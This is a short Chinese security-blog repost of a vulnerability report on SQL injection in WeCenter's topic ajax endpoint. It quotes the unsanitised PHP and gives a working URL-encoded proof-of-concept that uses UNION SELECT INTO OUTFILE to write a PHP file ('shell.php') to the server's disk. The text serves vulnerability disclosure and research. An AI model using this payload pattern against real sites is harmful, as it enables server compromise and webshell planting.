WeCenter SQL注射(ROOT SHELL) 没穿底裤 714文章 0评论 2020年1月1日03:34:24评论765 views字数 1095阅读3分39秒阅读模式 摘要文件ajax.phpurl: 然后就在d盘生成shell 漏洞作者: 路人甲 文件ajax.php public function question_list_action() { if ($_GET['feature_id']) { if ($topic_ids = $this->model('feature')->get_topics_by_feature_id($_GET['feature_id'])) { $_GET['topic_id'] = implode(',', $topic_ids); } } switch ($_GET['type']) { case 'best': $action_list = $this->model('topic')->get_topic_best_answer_action_list($_GET['topic_id'], $this->user_id, intval($_GET['page']) * get_setting('contents_per_page') . ', ' . get_setting('contents_per_page')) topic.php: public function get_topic_best_answer_action_list($topic_ids, $uid, $limit) { $cache_key = 'topic_best_answer_action_list_' . md5($topic_ids . $limit); if (!$result = AWS_APP::cache()->get($cache_key)) { echo " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'"; if ($topic_relation = $this->query_all("SELECT item_id FROM " . $this->get_table('topic_relation') . " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'")) url: http://localhost/WeCenter/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29%20union%20select%20%27%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%27%20into%20outfile%20%27D%3A%2fshell.php%27%23 然后就在d盘生成shell 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/76391.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论